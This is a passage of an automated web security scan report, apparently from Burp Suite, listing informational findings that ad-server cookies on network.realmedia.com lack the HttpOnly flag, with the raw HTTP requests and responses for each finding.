Date: Fri, 28 Jan 2011 21:58:07 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:09 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.468. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:22 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:24 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.469. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:27:15 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:17 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.470. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:23:08 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:10 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.471. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_o1efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:39:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 217
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 22:40:47 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/L34/230410894/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?23041089
...[SNIP]...

11.472. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:55 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:57 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.473. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:02:23 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:25 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.474. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:19:01 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:03 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.475. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:18 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.476. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:41 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1012Mr|O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:43 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.477. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:10:47 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:49 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

11.478. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
